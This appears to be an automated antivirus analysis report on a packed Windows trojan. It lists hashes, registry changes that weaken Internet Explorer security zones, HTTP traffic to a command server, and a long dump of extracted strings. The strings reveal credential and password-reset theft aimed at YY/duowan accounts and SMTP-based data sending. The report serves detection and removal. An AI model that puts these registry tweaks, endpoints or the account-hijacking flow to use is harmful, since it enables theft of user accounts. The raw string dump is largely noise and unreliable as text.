MD5: b0e76e5fa28e60f5494725558e503e6e
SHA1: 35843cb8a70d28d2b52b02e1c3648eec90fb2a9b
SHA256: 2a011c15433155a87df5df7a2331bc659cbd3c251ed531c31a213cdbc56d005b
SSDeep: 24576:O8mMKiqIH4RqU3S3pWaYm0ms5M6WrU5QAnCKNpmAOYYbwmxQ7E:WicRqU3SZd90bm43CY96TOg
Size: 1736704 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2011-11-26 08:28:36
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1552

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
__DDrawCheckExclMode__
__DDrawExclMode__
DDrawWindowListMutex
DDrawDriverObjectListMutex
RasPbFile
ShimCacheMutex

File activity

The process %original file name%.exe:1552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)

Registry activity

The process %original file name%.exe:1552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1322288916"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "%original file name%.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 50 C3 6D C5 74 EF 08 F7 30 7F 7C 57 01 CC C6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ???????
Product Name: ??YY?????????
Product Version: 4.0.0.0
Legal Copyright: ???????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.0.0.0
File Description: ??QQ:1261278285
Comments: ??QQ:1261278285
Language: English (United States)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://124.232.163.136/wanda/api.php
hxxp://124.232.163.136/wanda/api.php?WebShieldDRSessionVerify=eYMnR7JeA74b317eN6jy

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0

Traffic

GET /wanda/api.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: hXXp://124.232.163.136/wanda/api.php

Accept-Language: en-us

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: 124.232.163.136

Cache-Control: no-cache

HTTP/1.1 404 Not Found

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-Powered-By: PHP/5.5.13

X-Powered-By: ASP.NET

Date: Sun, 05 Jun 2016 20:04:47 GMT

Content-Length: 25
No input file specified......

GET /wanda/api.php?WebShieldDRSessionVerify=eYMnR7JeA74b317eN6jy HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: hXXp://124.232.163.136/wanda/api.php

Accept-Language: en-us

Connection: Keep-Alive

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: 124.232.163.136

Cache-Control: no-cache

HTTP/1.1 302 Found

Server: Safedog/4.0.0

Location: /wanda/api.php

Content-Length: 0

Connection: Close

Content-Type: text/html

POST /wanda/api.php HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Referer: hXXp://124.232.163.136/wanda/api.php

Accept-Language: en-us

Content-Type: application/x-www-form-urlencoded

Content-Length: 16

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

Host: 124.232.163.136

Cache-Control: no-cache

action=q_s&sid=8
HTTP/1.1 302 Found

Server: Safedog/4.0.0

Location: /wanda/api.php?WebShieldDRSessionVerify=eYMnR7JeA74b317eN6jy

Content-Length: 0

Connection: Close

Content-Type: text/html

The Trojan connects to the servers at the folowing location(s):

.text

.rdata

@.data

.rsrc

t%SVh

t$(SSh

|$D.tm

~%UVW

t.It It

u$SShe

ole32.dll

wininet.dll

WanDaVC.dll

kernel32.dll

gdiplus.dll

user32.dll

WinINet.dll

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

MsgWaitForMultipleObjects

GetVcodeFromURL

GdiplusShutdown

EnumWindows

GetWindowsDirectoryA

HttpAddRequestHeadersA

{A068799B-7551-46b9-8CA8-EEF8357AFEA4}

*.txt

(*.*)|*.*

1261278285

z>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

http=

HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Content-Type: application/x-www-form-urlencoded

hXXp://

\TEMP.TMP

\config.ini

Atexe

baIK&.com/login.do

hXXps://udb.

&password=

url=&username=

.com/welcome.do

The URL has moved

.com/ajax.do

action=checkLoginFreqIp&ajax=true&whichOpra=设置密保问题action=password&ajax=true&whichOpra=设置密保问题&currpswd=

.com/security/authorization.do?ajax=true

action=password&ajax=true&whichOpra=设置密保问题&currpswd=

.com/security/question.do?action=questionB&ajax=true

.com/logout.do

hXXps://

.com/verify/login.do

hXXps://udb.yy.com/security/authorization.do?ajax=true

action=password&currpswd=

hXXps://udb.yy.com/account2/resetQuestion4_2_2.do

.com/account2/resetQuestion3_2_1.do

.com/account2/resetQuestion3_2_2.do

hXXp://udb.

.com/account2/resetQuestion4_2_2.do

action=checkLoginFreqIp&ajax=true&whichOpra=修改密保问题

action=question&ajax=true&whichOpra=修改密保问题&answer=

action=checkLoginFreqIp&ajax=true&whichOpra=设置密保邮箱

action=question&ajax=true&whichOpra=设置密保邮箱&answer=

action=password&ajax=true&whichOpra=设置密保邮箱&currpswd=

.com/security/email.do?action=emailB&email=

.com/security/email.do

hXXps://udb.yy.com/account/email4_0_2.do?ajax=true&resetId=

.com/account/email2.do

.com/account2/email3_1_1.do

.com/account/email3_1_3.do?ajax=true

yy.com

.com/password.do

.com/password.do?ajax=true

&password=&newpassword=

hXXps://udb.yy.com/account2/emailFast1_1.do?ajax=true

duowan.com

.com/account/forgetPassword2.do

.com/ajax.do?action=checkSecurityCode&ajax=true&securityCode1=

.com/account/forgetPassword2_checkUser4ToModifyPwdWithAuthToken.do?Ajax=true

.com/account/forgetPassword2_toModifyPwdWithAuthToken.do

.com/security/authorization.do?ajax=true&auth_no_login_user=

.com/account/forgetPassword2_modifyPwdWithAuthToken.do

&newpassword=

Account.passwordQuestion2.init('success')

hXXps://udb.yy.com/login.jsp

&url=http://VVV.yy.com

&passwd=

hXXps://udb.yy.com/security/index.do

hXXps://udb.yy.com/verify/register.do?1315474843062

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

{557CF400-1A04-11D3-9A73-0000F81EF32E}

{557CF401-1A04-11D3-9A73-0000F81EF32E}

{557CF402-1A04-11D3-9A73-0000F81EF32E}

{557CF405-1A04-11D3-9A73-0000F81EF32E}

{557CF406-1A04-11D3-9A73-0000F81EF32E}

**.dU

hXXp://shop62281233.taobao.com/

hXXp://124.232.163.136/wanda/api.php

%S4WD

hg%fpM

S.Ac9SR

0.I%3s

,wAe.kI

aiUy'4xu

%c*@j

.eH'y

{&%U)

lj%4U

xe%CNs

9F.cLe

hJK.ZH

O.qt0

KERNEL32.DLL

COMCTL32.dll

GDI32.dll

MSIMG32.dll

MSVCRT.dll

MSVFW32.dll

USER32.dll

SkinH_EL.dll

VVV.3600gz.cn

hXXp://124.232.163.136/wanda/exe/

action=login&u=

hXXp://VVV.ip138.com/ip2city.asp

hXXp://checkip.dyndns.org/

hXXp://whois.ipcn.org/

hXXp://ip.chinaz.com/

0.0.0.0

LoginID

LoginPW

hXXp://wpa.qq.com/msgrd?V=1&Uin=

@qq.com

[email protected]

smtp.126.com

.exe.tmp

Del Temp.zip

\Temp.zip

5update.bat

(@\info.ini

[email protected]

.exe|.rar|.zip|.gif|.jpg|.mp3|.rm

{EE09B103-97E0-11CF-978F-00A02463E06F}

Keys

@VBScript.RegExp

hXXp://bc.3600gz.cno

Adobe Photoshop CS2 Windows

2010:10:21 00:30:36

~?k}%C

urlTEXT

MsgeTEXT

"!& 7/&)4)!"0A149;>>>%.DIC<H7=>;

2010:11:24 10:10:55

9Z).aY

inflate 1.1.3 Copyright 1995-1998 Mark Adler

%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

RASAPI32.dll

iphlpapi.dll

SHLWAPI.dll

MPR.dll

WINMM.dll

WS2_32.dll

VERSION.dll

GetProcessHeap

WinExec

GetKeyState

GetViewportOrgEx

WINSPOOL.DRV

RegCloseKey

RegOpenKeyExA

RegCreateKeyExA

ADVAPI32.dll

ShellExecuteA

SHELL32.dll

OLEAUT32.dll

oledlg.dll

WININET.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

.PAVCException@@

.PAVCNotSupportedException@@

.PAVCFileException@@

(*.prn)|*.prn|

(*.*)|*.*||

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

Kernel32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

: %d]

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

windows

out.prn

%d.%d

%d / %d

%d/%d

Bogus message code %d

(%d-%d):

%ld%c

glViewport

glTexEnvfv

glTexEnvf

\glu32.dll

\Opengl32.dll

glPassThrough

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

HELO %s

SMTP

AUTH LOGIN

LOGIN

AUTH=LOGIN

EHLO %s

Content-Type: application/octet-stream; name=%s

Content-Disposition: attachment; filename=%s

MAIL FROM:<%s>

RCPT TO:<%s>

x86 Family %s Model %s Stepping %s

X-X-X-X

\\.\Smartvsd

\\.\PhysicalDrive%d

\\.\Scsi%d:

[%s:%d]

Range: bytes=%s-

[%s:%d]

PASS %s

PASS ******

USER %s

E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp

SIZE %s

PORT

User-Agent: %s

Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)

Referer: %s

Host: %s

GET %s HTTP/1.1

HTTP/1.0

Cookie: %s

%d, %s

\\192.168.0.129\TCP\1037

NSPlayer/9.0.0.2980; {%s}; Host: %s

rmff_fix_header: assuming data.size=%i

rmff_fix_header: assuming data.num_packets=%i

rmff_fix_header: assuming prop.num_packets=%i

rmff_fix_header: setting prop.data_offset from %i to %i

rmff_fix_header: correcting prop.num_streams from %i to %i

rmff_fix_header: correcting prop.size from %i to %i

%s %s %s

Session: %s

Cseq: %u

%*s %s

%*s %u

CSeq: %u

rtsp://%s:%i

rtsp://%s:%i/%s

ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586

GUID: 00000000-0000-0000-0000-000000000000

[%s:%d]

User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)

Range: npt=%s-

%s/streamid=1

%s/streamid=0

Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play

If-Match: %s

RealChallenge2: %s, sd=%s

Title: %s

Copyright: %s

Author: %s

real: Content-length for description too big (> %uMB)!

Require: com.real.retain-entity-for-setup

SupportsMaximumASMBandwidth: 1

Bandwidth: %u

Challenge1: %s

hash output: %x %x %x %x

hash input: %x %x %x %x

stream=%u;rule=%u,

Illegal character '%c' in input.

1.1.3

(*.htm;*.html)|*.htm;*.html

;3 #>6.&

'2, / 0&7!4-)1#

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

zcÁ

right-curly-bracket

left-curly-bracket

.232.163.136

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

0246813579

1, 0, 6, 6

- Skin.dll

(*.*)

4.0.0.0

%original file name%.exe_1552_rwx_00401000_00127000:

t%SVh

t$(SSh

|$D.tm

~%UVW

t.It It

u$SShe

%original file name%.exe_1552_rwx_10028000_00015000:

msctls_hotkey32

TVCLHotKey

THotKey

\skinh.she

}uo,x6l5k%x-l h

9p%s m)t4`#b

e"m?c&y1`Ð<

SetViewportOrgEx

SetViewportExtEx

SetWindowsHookExA

UnhookWindowsHookEx

EnumThreadWindows

EnumChildWindows

`c%US.4/

!#$<#$#=

.text

`.rdata

@.data

.rsrc

@.UPX0

`.UPX1

`.reloc

hJK.ZH

O.qt0

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)

4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
5. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.